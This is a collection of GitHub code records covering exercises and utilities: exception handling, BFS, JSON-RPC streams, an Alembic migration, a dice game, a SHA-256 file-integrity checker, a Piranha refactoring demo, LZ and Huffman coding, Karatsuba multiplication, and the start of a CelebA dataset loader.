+{"seq_id":"16372183590","text":"import random\n\n\ndef foo(number=None):\n    if not number:\n        random.seed()\n        number = random.randint(1, 3)\n    if number == 1:\n        raise ZeroDivisionError\n    elif number == 2:\n        raise ArithmeticError\n    else:\n        raise AssertionError\n\n\ndef main(number=None):\n    try:\n        foo(number)\n    except ZeroDivisionError:\n        print(\"ZeroDivisionError\")\n    except ArithmeticError:\n        print(\"ArithmeticError\")\n    except AssertionError:\n        print(\"AssertionError\")\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"ivaninkv/python_basics","sub_path":"week2/module1/module2_11.py","file_name":"module2_11.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"17585650662","text":"from collections import deque\r\n\r\nn, m = map(int, input().split())\r\npaper = [list(map(int, input().split())) for _ in range(n)]\r\n\r\n# visited list that stores the positions already visited\r\nvisited = [[False]*m for _ in range(n)]\r\n\r\n# define the direction vectors\r\ndx = [-1, 1, 0, 0]\r\ndy = [0, 0, -1, 1]\r\n\r\n\r\ndef bfs(x, y):\r\n    q = deque()\r\n    q.append((x, y))\r\n    visited[x][y] = True\r\n    count = 1  # variable that counts the size of the picture\r\n\r\n    while q:\r\n        x, y = q.popleft()\r\n\r\n        # explore up, down, left and right from the current position\r\n        for i in range(4):\r\n            nx = x + dx[i]\r\n            ny = y + dy[i]\r\n\r\n            # the position is outside the drawing paper\r\n            if nx < 0 or ny < 0 or nx >= n or ny >= m:\r\n                continue\r\n\r\n            # the position was already visited or is not part of a picture\r\n            if visited[nx][ny] or paper[nx][ny] == 0:\r\n                continue\r\n\r\n            q.append((nx, ny))\r\n            visited[nx][ny] = True\r\n            count += 1\r\n\r\n    return count\r\n\r\n\r\ncount = 0\r\nmax_size = 0  # variable that stores the size of the largest picture\r\n\r\nfor i in range(n):\r\n    for j in range(m):\r\n        if not visited[i][j] and paper[i][j] == 1:\r\n            count += 1\r\n            size = bfs(i, j)\r\n            if size > max_size:\r\n                max_size = size\r\n\r\nprint(count)\r\nprint(max_size)\r\n","repo_name":"EEDK/StudyBaekJoon","sub_path":"백준/Silver/1926. 
그림/그림.py","file_name":"그림.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"38183583359","text":"import logging\nimport threading\n\ntry:\n import ujson as json\nexcept Exception: # pylint: disable=broad-except\n import json\n\nlog = logging.getLogger(__name__)\n\n\nclass JsonRpcStreamReader(object):\n\n def __init__(self, rfile):\n self._rfile = rfile\n\n def close(self):\n self._rfile.close()\n\n def listen(self, message_consumer):\n \"\"\"Blocking call to listen for messages on the rfile.\n\n Args:\n message_consumer (fn): function that is passed each message as it is read off the socket.\n \"\"\"\n while not self._rfile.closed:\n try:\n request_str = self._read_message()\n except ValueError:\n if self._rfile.closed:\n return\n else:\n log.exception(\"Failed to read from rfile\")\n\n if request_str is None:\n break\n\n try:\n message_consumer(json.loads(request_str.decode('utf-8')))\n except ValueError:\n log.exception(\"Failed to parse JSON message %s\", request_str)\n continue\n\n def _read_message(self):\n \"\"\"Reads the contents of a message.\n\n Returns:\n body of message if parsable else None\n \"\"\"\n line = self._rfile.readline()\n\n if not line:\n return None\n\n content_length = self._content_length(line)\n\n # Blindly consume all header lines\n while line and line.strip():\n line = self._rfile.readline()\n\n if not line:\n return None\n\n # Grab the body\n return self._rfile.read(content_length)\n\n @staticmethod\n def _content_length(line):\n \"\"\"Extract the content length from an input line.\"\"\"\n if line.startswith(b'Content-Length: '):\n _, value = line.split(b'Content-Length: ')\n value = value.strip()\n try:\n return int(value)\n except ValueError:\n raise ValueError(\"Invalid Content-Length header: {}\".format(value))\n\n return None\n\n\nclass JsonRpcStreamWriter(object):\n\n def __init__(self, wfile, **json_dumps_args):\n self._wfile = wfile\n self._wfile_lock = threading.Lock()\n self._json_dumps_args = json_dumps_args\n\n def close(self):\n with self._wfile_lock:\n self._wfile.close()\n\n def write(self, message):\n with self._wfile_lock:\n if self._wfile.closed:\n return\n try:\n body = json.dumps(message, **self._json_dumps_args)\n\n # Ensure we get the byte length, not the character length\n content_length = len(body) if isinstance(body, bytes) else len(body.encode('utf-8'))\n\n response = (\n \"Content-Length: {}\\r\\n\"\n \"Content-Type: application/vscode-jsonrpc; charset=utf8\\r\\n\\r\\n\"\n \"{}\".format(content_length, body)\n )\n\n self._wfile.write(response.encode('utf-8'))\n self._wfile.flush()\n except Exception: # pylint: disable=broad-except\n log.exception(\"Failed to write message to output file %s\", message)\n","repo_name":"komeilkma/LHC-monitoring-control-system","sub_path":"src/streams.py","file_name":"streams.py","file_ext":"py","file_size_in_byte":3234,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"67"} +{"seq_id":"4580302423","text":"\"\"\"add publictaion producer id index\n\nRevision ID: afdac32d3727\nRevises: f2d86f822460\nCreate Date: 2020-03-19 17:33:08.530519\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = \"afdac32d3727\"\ndown_revision = \"f2d86f822460\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.create_index(\n \"ik_publication_producer_id\", \"publication\", [\"producer_id\", 
\"published_at\"]\n )\n\n\ndef downgrade():\n op.drop_index(\"ik_publication_producer_id\", table_name=\"publication\")\n","repo_name":"disinfoRG/ArticleParser","sub_path":"migrations/versions/afdac32d3727_add_publictaion_producer_id_index.py","file_name":"afdac32d3727_add_publictaion_producer_id_index.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"3213803938","text":"\n# Name : Hongju (Eugene) Shin\n# Date : 30 Sep 2021\n# App Name : Dice Bet\n# App Description: Game that players must guess the result of 2 dice\n\nfrom os import system, truncate\nimport random # Allow us to generate random numbers\n\n# Set the console title\nsystem(\"title Dice Bet - Hongju(Eugene) Shin\")\n\n# Contants\nMIN_BET, MAX_BET = 2, 12\nMIN_ROLL, MAX_ROLL = 1, 6\n\n# Ask the user to place a bet\nbet = input(f\"Place your bet between {MIN_BET} and {MAX_BET}: \")\n\n# Try to convert from string to integer\ntry:\n bet = int(bet)\n numeric = True # Able to convert\nexcept:\n numeric = False # Unable to convert\n\n# If the bet is not numeric, then print an error\nif not numeric:\n print(\"Error - Bet must be numeric\")\n\n# If the bet is not in the valid range, then print an error\n# and - Both condition must be true\n# or - just need one of the condition to be true\nelif MIN_BET > bet or bet > MAX_BET:\n print(f\"Error - Bet must be between {MIN_BET} and {MAX_BET}\")\n\n# Valid bet - we can play now\nelse:\n print(\"Rolling dice !\")\n # Generate two random numbers !\n dice_one = random.randint(MIN_ROLL, MAX_ROLL)\n dice_two = random.randint(MIN_ROLL, MAX_ROLL)\n\n # Add the dice result and store the result in a variable\n outcome = dice_one + dice_two\n\n # Print the bet and the dice result\n print(f\"Your bet: {bet}\")\n print(f\"Dice Result: {dice_one} + {dice_two} = {outcome}\")\n\n # Decide if the player wins or loses\n # Player guesses the number, print \"you WIN\" if the bet is right, print \"You lose\" in else cases\n print(\"You WIN! :D\") if bet == outcome else print(\"You lose :(\")\n\n# Exit prompt\ninput(\"Press [Enter] to exit\")\n","repo_name":"Eugene2077/Python","sub_path":"PROG1205/Ice04_Numeric_String_Data.py","file_name":"Ice04_Numeric_String_Data.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"26328166800","text":"# April 16th 2017, this source code is public domain.\r\n# Augusto Vera, Monterrey, NL, México.\r\n# @augustweet, averaguilar@outlook.com.\r\n\r\nimport sys # This script's command line interface\r\nimport csv # CSV manipulation\r\nimport subprocess # Calling external executables with command line\r\nimport configparser # Module to read from ini files ver. 
< 3.0\r\nimport glob # Module to read the folder and filenames\r\nimport hashlib # MD5 hash library\r\nimport time # Date and Time module\r\nimport os.path # Pathnames funcions module\r\nfrom xml.etree import ElementTree as elTree\r\n\r\n\r\ndef mainGenerateHashes(pathToRead):\r\n\r\n countFiles, xmlDBFile, logFileName = 0, 's3curefiledb.xml', 's3curefilelog.csv'\r\n \r\n writeToLog(logFileName, '>>> HASH DB CREATION STARTED: '+ pathToRead)\r\n #Read the folder structure and save in XML Database\r\n root = elTree.Element('AllItems') # create the element Allitems for XML root and pass it to the created tree\r\n tree = elTree.ElementTree(root)\r\n BLOCKSIZE = 65536 # Block size to read in case of a large file.\r\n for fileName in glob.iglob(pathToRead + '**\\*.*', recursive=True): \r\n hasher = hashlib.sha256()\r\n with open(fileName, 'rb') as afile:\r\n buf = afile.read(BLOCKSIZE)\r\n while len(buf) > 0: # as long as a block was read\r\n hasher.update(buf)\r\n buf = afile.read(BLOCKSIZE) \r\n print(hasher.hexdigest())\r\n root.append(dict_to_elem({'filename':fileName, 'SHA256hash': hasher.hexdigest()}))\r\n countFiles += 1\r\n # use last row of XML to store the base path and total number of files hashed\r\n root.append(dict_to_elem({'basepath':pathToRead, 'totalfiles': str(countFiles)}))\r\n # Write the XML Database with all the filenames and hashes extracted\r\n with open(xmlDBFile, 'w', encoding='utf-8') as file:\r\n tree.write(file, encoding='unicode')\r\n writeToLog(logFileName, '>>> HASHDB CREATION FINISHED total files hashed: ' + str(countFiles))\r\n\r\n\r\ndef mainVerify():\r\n logFileName, xmlFileName = 's3curefilelog.csv', 's3curefiledb.xml'\r\n\r\n # Generate the tree of XML in memory\r\n dom = elTree.parse(xmlFileName)\r\n # pulls all the FILEITEMs under the root along with all the subelements: filename and SHA256hash\r\n fileItems, totalFilesInDB, verifyPath = dom.findall('FILEITEM'), dom.findtext(\"FILEITEM/totalfiles\"), dom.findtext(\"FILEITEM/basepath\")\r\n totalFilesVerified, filesMissing = 0, 0\r\n #verifyPath = dom.findtext(\"FILEITEM/basepath\") #<<<--- Extract the entire path and filename\r\n writeToLog(logFileName, '>>> HASH VERIFICATION STARTED ' + verifyPath)\r\n print(\">>>> \", verifyPath) \r\n BLOCKSIZE = 65536 # Block size to read in case of a large file.\r\n # Next for block: traverse 1 by 1 all the FILEITEMs until len -1\r\n # because the last FILEITEM is the base path, and file counter.\r\n for fileItemsIndex in range(0,len(fileItems)-1): \r\n # then for every FILEITEM in turn, extract the filename frpm XML DB and the paired SHA256hash\r\n evalList = []\r\n for chld in fileItems[fileItemsIndex]: \r\n evalList.append(chld.text)\r\n # print('File: ' + files[fil].text, ' Hash: ', hashes[fil].text)\r\n print('evalList: ', evalList)\r\n hasher = hashlib.sha256()\r\n if os.path.isfile(evalList[0]):\r\n with open(evalList[0], 'rb') as afile: # open the file in the database FILEITEM/filename for binary read\r\n buf = afile.read(BLOCKSIZE)\r\n while len(buf) > 0: # as long as a block was read\r\n hasher.update(buf)\r\n buf = afile.read(BLOCKSIZE)\r\n hashFromFile = hasher.hexdigest() # Generate the SHA256 file's value\r\n if hashFromFile != evalList[1]:\r\n logmsg = \"* WARNING 01 * \" + evalList[0] + ' hash: ' + hashFromFile + ' db hash: ' + evalList[1]\r\n else:\r\n logmsg = 'file OK ' + evalList[0]\r\n totalFilesVerified += 1\r\n else:\r\n logmsg = '* WARNING 02 * the file < ' + evalList[0] + ' > in database is not present'\r\n filesMissing += 1\r\n 
writeToLog(logFileName, logmsg)\r\n writeToLog(logFileName, '>>> HASH VERIFICATION ENDED: files verified: '\\\r\n + str(totalFilesVerified) + ' files missing in dir: '\\\r\n + str(filesMissing))\r\n\r\ndef logExists(logName):\r\n return os.path.isfile(logName)\r\n\r\n\r\ndef initLog(logName):\r\n with open(logName, 'w') as logFile:\r\n logFileWriter = csv.writer(logFile)\r\n logFileWriter.writerow([time.strftime('%d/%m/%Y ') + time.strftime('%H:%M:%S'), '[>>> LOG FILE CREATED] > '])\r\n logFile.close()\r\n\r\n\r\ndef writeToLog(logName, message):\r\n with open(logName, 'a') as logFile:\r\n logFileWriter = csv.writer(logFile)\r\n logFileWriter.writerow([time.strftime('%d/%m/%Y ') + time.strftime('%H:%M:%S'), '[' + message + '] > '])\r\n logFile.close()\r\n \r\n\r\ndef dict_to_elem(dictionary):\r\n item = elTree.Element('FILEITEM') # Item names cannot contain spaces for proper XML read in XML editors.\r\n for key in dictionary:\r\n field = elTree.Element(key.replace(' ',''))\r\n field.text = dictionary[key]\r\n item.append(field)\r\n return item\r\n\r\n\r\nif __name__ == \"__main__\":\r\n # the following two lines are kept in case of debugging without the cmd line\r\n # mainVerify()\r\n # mainGenerateHashes('D:\\\\PASAR A USB\\\\')\r\n logFile, xmlDB = 's3curefilelog.csv', 's3curefiledb.xml'\r\n\r\n if not logExists(logFile):\r\n initLog(logFile)\r\n # Check the command line arguments\r\n if len(sys.argv) == 2:\r\n writeToLog(logFile, 'cmd line received: ' + sys.argv[1])\r\n if sys.argv[1] == '-v': # <<<--- if the command passed was -v, then verify files in the path against the XML database\r\n if os.path.exists(xmlDB): # if a -v command was passed, chech if xml db exists\r\n mainVerify()\r\n else:\r\n writeToLog(logFile, '* WARNING 04 * xml database does not exist ')\r\n sys.exit(2)\r\n else:\r\n dirArgument = sys.argv[1] + '\\\\' # it works if the path is ended in \\ or not\r\n if not os.path.exists(dirArgument):\r\n writeToLog(logFile, 'Path does not exist: ' + sys.argv[1])\r\n elif not os.path.isdir(dirArgument):\r\n writeToLog(logFile, 'Path is not a directory: ' + sys.argv[1])\r\n else:\r\n print(dirArgument)\r\n mainGenerateHashes(dirArgument) # <<<--- If the command passed was a path, generate the hashes\r\n sys.exit(0)\r\n else:\r\n writeToLog(logFile, '* WARNING 03 * incorrect cmd line USAGE: s3curefile (PATH or -v)')\r\n sys.exit(1)","repo_name":"Averaguilar/S3CUREFILE","sub_path":"s3curefile.py","file_name":"s3curefile.py","file_ext":"py","file_size_in_byte":6943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"32000766245","text":"from os.path import join, dirname, getmtime, exists\nfrom polyglot_piranha import Rule, RuleGraph, execute_piranha, PiranhaArguments\nimport logging\nfrom logging import info\n\nfeature_flag_dir = join(dirname(__file__), \"feature_flag_cleanup_using_py_api\")\n\n\ndef run_java_ff_demo():\n info(\"Running the stale feature flag cleanup demo for Java\")\n\n directory_path = join(feature_flag_dir, \"java\")\n modified_file_path = join(directory_path, \"SampleClass.java\")\n\n update_is_treated = Rule(\n name=\"update_is_treated\",\n # :[e] matches any node (its like a hole) and @flag_name refers to the substitution\n query='cs :[e].isTreated(\"@flag_name\")',\n replace_node=\"*\",\n # @treated refers to the substitution\n replace=\"@treated\",\n groups={\"replace_expression_with_boolean_literal\"},\n # This is a list of holes that need to be filled in for the rule to be applied\n 
holes={\"treated\", \"flag_name\"}\n    )\n\n    args = PiranhaArguments(\n        \"java\",\n        paths_to_codebase=[directory_path],\n        substitutions={\"flag_name\": \"SAMPLE_STALE_FLAG\", \"treated\": \"true\"},\n        rule_graph=RuleGraph(rules=[update_is_treated], edges=[])\n    )\n\n    old_mtime = getmtime(modified_file_path)\n\n    output_summaries = execute_piranha(args)\n\n    assert len(output_summaries) == 1\n\n    for summary in output_summaries:\n        assert len(summary.rewrites) > 0\n\n    new_mtime = getmtime(modified_file_path)\n\n    assert old_mtime < new_mtime\n\n\nFORMAT = \"%(levelname)s %(name)s %(asctime)-15s %(filename)s:%(lineno)d %(message)s\"\nlogging.basicConfig(format=FORMAT)\nlogging.getLogger().setLevel(logging.DEBUG)\n\nrun_java_ff_demo()\nprint(\"Completed running the stale feature flag cleanup demos\")\n","repo_name":"uber/piranha","sub_path":"demo/stale_feature_flag_cleanup_demos_using_py_api.py","file_name":"stale_feature_flag_cleanup_demos_using_py_api.py","file_ext":"py","file_size_in_byte":1740,"program_lang":"python","lang":"en","doc_type":"code","stars":2163,"dataset":"github-code","pt":"67"}
+{"seq_id":"11997170282","text":"import string\n\n#FUNCTION THAT, GIVEN AN INPUT TEXT, BUILDS THE ENTRY DICTIONARY FOR THE LEMPEL-ZIV ENCODING \ndef LZ(text):\n    #initialize the offset used to scan text\n    m = 1\n    #initialize the reference number for the blocks\n    ref = 1\n    #initialize the dictionary holding the blocks with their pointers (ref)\n    refblockDiz = {\"\": 0, text[0]: ref}\n    #initialize the dictionary holding the entries \n    entranceDiz = {\"0\": text[0]}\n    for i in range(2, len(text)+1):\n        padding = \"\"\n        #extract the next block from text, checking it has not been processed yet\n        textTemp = text[m:i]\n        if textTemp in refblockDiz:\n            continue\n        #update the block reference dictionary\n        ref += 1\n        refblockDiz.update({textTemp: ref})\n        #handle the bit padding to avoid ambiguity in entranceDiz\n        if len(bin(ref-1)[2:]) > len(bin(refblockDiz[textTemp[:-1]])[2:]):\n            diff = len(bin(ref-1)[2:]) - len(bin(refblockDiz[textTemp[:-1]])[2:])\n            while diff > 0:\n                padding += \"0\"\n                diff -= 1\n        #update the entry dictionary and the offset used to scan text\n        entranceDiz.update({padding + bin(refblockDiz[textTemp[:-1]])[2:]: textTemp[-1]})\n        m = i\n    \n    #handle the last block of the string to encode, in case it is a block already seen before\n    if textTemp in refblockDiz:\n        padding = \"\"\n        ref += 1\n        refblockDiz.update({textTemp: ref})\n        if len(bin(ref-1)[2:]) > len(bin(refblockDiz[textTemp[:-1]])[2:]):\n            diff = len(bin(ref-1)[2:]) - len(bin(refblockDiz[textTemp[:-1]])[2:])\n            while diff > 0:\n                padding += \"0\"\n                diff -= 1\n        entranceDiz.update({padding + bin(refblockDiz[textTemp[:-1]])[2:]: textTemp[-1]})\n    print(\"the reference dictionary is: \", refblockDiz)\n    print(\"the entry dictionary is: \", entranceDiz)\n    return entranceDiz\n\n#FUNCTION THAT ENCODES text WITH LZ USING THE ENTRY DICTIONARY GENERATED BY LZ() AND A DICTIONARY\n#THAT MAPS EACH LETTER TO A DEFAULT SYMBOL\ndef LZCode(text, entranceDiz, defaultDiz):\n    #initialize the string that will hold the encoded text\n    encodedtext = \"\"\n    #scan the entry dictionary, appending to encodedtext at each step the entry code\n    #plus the symbol associated with the last letter of the block being encoded\n    for i in entranceDiz.keys():\n        encodedtext += (i + defaultDiz[entranceDiz[i]])\n    print(\"the text encoded with lempel-ziv is: \", encodedtext)\n    return encodedtext\n\n#FUNCTION THAT GENERATES A Huffman CODE FOR alphabet\ndef Huffman(alphabet, prob):\n    #create the list holding, at position i, the two elements merged at step i of phase 1 of the algorithm\n    mergeOrder = []\n    #create the dictionary where the symbol-code associations are stored\n    code = {}\n\n    #start phase 1 of the algorithm\n    while len(prob) != 1:\n        #store the index of the smallest probability in prob\n        min1 = prob.index(min(prob))\n        #store the smallest element of prob and remove it from prob\n        probmin1 = prob.pop(min1)\n        #store the element of alphabet with the smallest probability and remove it from alphabet \n        alphabetmin1 = alphabet.pop(min1)\n        #store the index of the second smallest probability in prob\n        min2 = prob.index(min(prob))\n        #update prob, replacing the entry at the position of the second smallest element\n        #with the sum of the two smallest probabilities of the current iteration\n        prob[min2] = probmin1 + prob[min2]\n        #store in mergeOrder the two elements of alphabet that were just merged\n        mergeOrder.append([alphabet[min2], alphabetmin1])\n        #update alphabet, replacing the entry at the position of the second smallest-probability element\n        #with a list containing the two merged elements\n        alphabet[min2] = [alphabet[min2], alphabetmin1]\n\n    #start phase 2 of the algorithm\n    #store and remove the last element of mergeOrder, which holds the two elements\n    #merged in the last iteration of phase 1\n    lastMerged = mergeOrder.pop(len(mergeOrder)-1)\n    #initialize the dictionary, assigning codes 0 and 1 to the two elements\n    #merged in the last iteration of phase 1\n    code.update({str(lastMerged[0]): \"0\", str(lastMerged[1]): \"1\"})\n    while len(mergeOrder) > 0:\n        lastMerged = mergeOrder.pop(len(mergeOrder)-1)\n        #store in codeword the code, within the dictionary, of the key\n        #representing the element to be \"expanded\" in the current iteration\n        codeword = code[str(lastMerged)]\n        #remove this element from the dictionary and replace it with two elements whose\n        #keys represent the components of the removed key and whose values equal the code\n        #of the removed key, with 0 and 1 appended respectively\n        code.pop(str(lastMerged))\n        code.update({str(lastMerged[0]): codeword + \"0\", str(lastMerged[1]): codeword + \"1\"})\n    print(\"the code represented as a dictionary is: \\n\", code)\n    return code\n\n#FUNCTION THAT ENCODES TEXT USING THE HUFFMAN CODE GENERATED BY Huffman()\ndef HuffmanCode(text, code):\n    encodedtext = \"\"\n    for l in text:\n        encodedtext += code[l]\n    print(\"the text encoded with huffman is: \", encodedtext)\n    return encodedtext\n\n#FUNCTION THAT FORMATS THE TEXT IN UPPERCASE, REMOVING SPACES AND PUNCTUATION\ndef textFormatting(text):\n    for i in string.punctuation:\n        text = text.replace(i, \"\")\n    text = text.replace(\"—\", \"\")\n    text = text.replace(\"’\", \"\")\n    text = text.replace(\" \", \"\")\n    text = text.upper()\n    #print(text)\n    return text\n\n#FUNCTION THAT COMPARES THE COMPRESSION PERCENTAGES OF HUFFMAN AND LEMPEL-ZIV\ndef comparison(text, defaultDiz, alphabet, prob):\n    #format the text in uppercase, removing spaces and punctuation\n    text = textFormatting(text)\n    textBlocks = []\n    compressionPercH = []\n    compressionPercLZ = []\n    n = 10\n    m = len(text)//n\n    code = Huffman(alphabet, prob)\n    #split text into n blocks and store them in textBlocks\n    for i in range(n):\n        textBlocks.append(text[i*m: (i+1)*m])\n    #for each block, generate the corresponding code with both methods and store the compression\n    #percentage for Huffman and Lempel-Ziv in compressionPercH and compressionPercLZ respectively\n    for b in textBlocks:\n        #compute the compression for Huffman\n        encodedH = HuffmanCode(b, code)\n        percH = ((5*len(b) - len(encodedH)) / (5*len(b))) * 100\n        compressionPercH.append(percH)\n        #compute the compression for Lempel-Ziv\n        entranceDiz = LZ(b)\n        encodedLZ = LZCode(b, entranceDiz, defaultDiz)\n        percLZ = ((5*len(b) - len(encodedLZ)) / (5*len(b))) * 100\n        compressionPercLZ.append(percLZ)\n    #compute the mean of the two lists of per-block compression percentages\n    meancompressionH = (sum(compressionPercH)) / n\n    meancompressionLZ = (sum(compressionPercLZ)) / n\n    print(\"the average compression percentage using Huffman is: \", meancompressionH)\n    print(\"the average compression percentage using LZ is: \", meancompressionLZ)\n\n#TEST FUNCTION\ndef test():\n    alphabet = [\"A\", \"B\", \"C\", \"D\", \"E\", \"F\", \"G\", \"H\", \"I\", \"J\", \"K\", \"L\", \"M\", \"N\", \"O\", \"P\", \"Q\", \"R\", \"S\", \"T\", \"U\", \"V\", \"W\", \"X\", \"Y\", \"Z\"]\n    prob = [0.08167, 0.01492, 0.02782, 0.04253, 0.12702, 0.02228, 0.02228, 0.06094, 0.06966, 0.00153, 0.00772, 0.04025, 0.02406, 0.06749, 0.07507, 0.01929, 0.00095, 0.05987, 0.06327, 0.09056, 0.02758, 0.00978, 0.02360, 0.00150, 0.01974, 0.00074]\n    defaultDiz = {\"A\": \"0\", \"B\": \"1\", \"C\": \"11\", \"D\": \"100\", \"E\": \"101\", \"F\": \"110\", \"G\": \"111\", \"H\": \"1000\", \"I\": \"1001\", \"J\": \"1010\", \"K\": \"1011\", \"L\": \"1100\", \"M\": \"1101\", \"N\": \"1110\", \"O\": \"1111\", \"P\": \"10000\", \"Q\": \"10001\", \"R\": \"10010\", \"S\": \"10011\", \"T\": \"10100\", \"U\": \"10101\", \"V\": \"10110\", \"W\": \"10111\", \"X\": \"11000\", \"Y\": \"11001\", \"Z\": \"11010\"}\n    text1 = \"AABABBBABAABABBBABBABB\"\n    #test the encoding function on text1\n    entranceDiz = LZ(text1)\n    LZCode(text1, entranceDiz, defaultDiz)\n    f = open(r\"dummytext.txt\")\n    text2 = f.read()\n    f.close()\n    #compare LZ encoding with Huffman encoding on 10 blocks extracted from text2\n    print(\"\\nSTARTING COMPARISON PHASE\\n\")\n    comparison(text2, defaultDiz, alphabet, prob)\n    \ntest()","repo_name":"carlocek/data-security-exercises","sub_path":"LempelZiv.py","file_name":"LempelZiv.py","file_ext":"py","file_size_in_byte":8651,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"14822383205","text":"# -*- coding: utf-8 -*-\r\n\r\n# Q1\r\n\r\ndef poly_mult(P,Q):\r\n    product = [0 for _ in range(len(P) + len(Q) -1 )]\r\n    for i in range(len(P)):\r\n        for j in range(len(Q)):\r\n            if (i+j < len(P) + len(Q) - 1):\r\n                product[i+j] += P[i] * Q[j]\r\n    return product\r\n\r\ndef cost_mult(n): \r\n    return (2*n*n -n - n +1)\r\n    \r\n# Q2\r\n\r\ndef poly_add(P,Q):\r\n    size1 = len(P)\r\n    size2 = len(Q)\r\n    if size1 > size2:\r\n        s = P\r\n        for i in range(size2):\r\n            s[i] += Q[i]\r\n    else:\r\n        s = Q\r\n        for i in range(size1):\r\n            s[i] += P[i]\r\n    return s\r\n    \r\ndef neg(P):\r\n    Q = [0 for _ in range(len(P))]\r\n    for i in range(len(P)):\r\n        Q[i] = -P[i]\r\n    return Q\r\n    \r\ndef shift(P,k):\r\n    size = len(P) +k \r\n    result = [0 for _ in range(size)]\r\n    for i in range(len(P)):\r\n        result[i+k] = P[i]\r\n    return result \r\n    \r\n# Q3 \r\n    \r\ndef poly_kara_mult(P,Q):\r\n    n = len(P)\r\n    if n == 1:\r\n        return [P[0] * Q[0]]\r\n    k = (n+1)//2 \r\n    P0 = [P[i] for i in range(k)]\r\n    P1 = [P[i] for i in range(k, n)]\r\n    Q0 = [Q[i] for i in range(k)]\r\n    Q1 = [Q[i] for i in range(k, n)]\r\n    H0 = poly_kara_mult(P0, Q0)\r\n    H2 = 
poly_kara_mult(P1, Q1)\n H1 = poly_kara_mult(poly_add(P0,P1), poly_add(Q0, Q1))\n \n return poly_add(H0, \n poly_add(\n shift(poly_add(\n poly_add(H1, neg(H0)), neg(H2)), k),shift(H2, 2*k)))\n\n \n \n \n \n \ndef cost_poly_kara_mult(n):\n if n ==1 : return 1\n return 3 * cost_poly_kara_mult((n+1)//2) + 4*n\n\n\n# Q4 \n\ndef cost_poly_tc3_mult(n):\n if n == 1: \n return 1\n elif n == 2: \n return 3\n else: \n return 5 * cost_poly_tc3_mult((n+2)//3) + 30 *n\n pass\n\n# Q5 hybrid\n \ndef poly_switch_mult(d,P,Q):\n n = len(P)\n if n <= d:\n return poly_mult(P, Q)\n else:\n k = (n+1)//2 \n P0 = [P[i] for i in range(k)]\n P1 = [P[i] for i in range(k, n)]\n Q0 = [Q[i] for i in range(k)]\n Q1 = [Q[i] for i in range(k, n)]\n H0 = poly_switch_mult(d,P0, Q0)\n H2 = poly_switch_mult(d,P1, Q1)\n H1 = poly_switch_mult(d,poly_add(P0,P1), poly_add(Q0, Q1))\n \n return poly_add(H0, \n poly_add(\n shift(poly_add(\n poly_add(H1, neg(H0)), neg(H2)), k),shift(H2, 2*k)))\n\n \n\ndef cost_switch_mult(d,n):\n if n <= d: \n return 2*n**2 - 2*n +1 \n else:\n return 3* cost_switch_mult(d, (n+1)//2) + 4*n\n\n \n","repo_name":"yassine-turki/Polytechnique_Courses","sub_path":"CSE202/Tutorial_2/mult.py","file_name":"mult.py","file_ext":"py","file_size_in_byte":2506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"32676870842","text":"from __future__ import division\nfrom __future__ import print_function\nfrom __future__ import absolute_import\n\nimport os\nimport random\nimport numpy as np\nfrom PIL import Image\nfrom random import shuffle\nfrom scipy.misc import imresize\n\nimport torch\nimport torchvision.datasets as dset\nfrom torch.utils.data.dataset import Dataset\n\nVALID_PARTITIONS = {'train': 0, 'val': 1, 'test': 2}\nATTR_TO_IX_DICT = {'Sideburns': 30, 'Black_Hair': 8, 'Wavy_Hair': 33, 'Young': 39, 'Heavy_Makeup': 18, \n 'Blond_Hair': 9, 'Attractive': 2, '5_o_Clock_Shadow': 0, 'Wearing_Necktie': 38, \n 'Blurry': 10, 'Double_Chin': 14, 'Brown_Hair': 11, 'Mouth_Slightly_Open': 21, \n 'Goatee': 16, 'Bald': 4, 'Pointy_Nose': 27, 'Gray_Hair': 17, 'Pale_Skin': 26, \n 'Arched_Eyebrows': 1, 'Wearing_Hat': 35, 'Receding_Hairline': 28, 'Straight_Hair': 32, \n 'Big_Nose': 7, 'Rosy_Cheeks': 29, 'Oval_Face': 25, 'Bangs': 5, 'Male': 20, 'Mustache': 22, \n 'High_Cheekbones': 19, 'No_Beard': 24, 'Eyeglasses': 15, 'Bags_Under_Eyes': 3, \n 'Wearing_Necklace': 37, 'Wearing_Lipstick': 36, 'Big_Lips': 6, 'Narrow_Eyes': 23, \n 'Chubby': 13, 'Smiling': 31, 'Bushy_Eyebrows': 12, 'Wearing_Earrings': 34}\nATTR_IX_TO_KEEP = [4, 5, 8, 9, 11, 12, 15, 17, 18, 20, 21, 22, 26, 28, 31, 32, 33, 35]\nIX_TO_ATTR_DICT = {v:k for k,v in ATTR_TO_IX_DICT.iteritems()}\nN_ATTRS = len(ATTR_IX_TO_KEEP)\n\n\nclass CelebAttributes(Dataset):\n \"\"\"Load images of celebrities and attributes.\"\"\"\n def __init__(self, partition='train', image_transform=None, attr_transform=None):\n self.partition = partition\n self.image_transform = image_transform\n self.attr_transform = attr_transform\n \n assert partition in VALID_PARTITIONS.keys()\n self.image_paths = load_eval_partition(partition)\n self.attr_data = load_attributes(self.image_paths, partition)\n self.size = int(len(self.image_paths))\n\n def __getitem__(self, index):\n \"\"\"\n Args:\n index (int): Index\n Returns:\n tuple: (image, target) where target is index of the target class.\n \"\"\"\n image_path = os.path.join('./data/img_align_celeba/', self.image_paths[index])\n attr = self.attr_data[index]\n\n # open PIL Image\n image = 
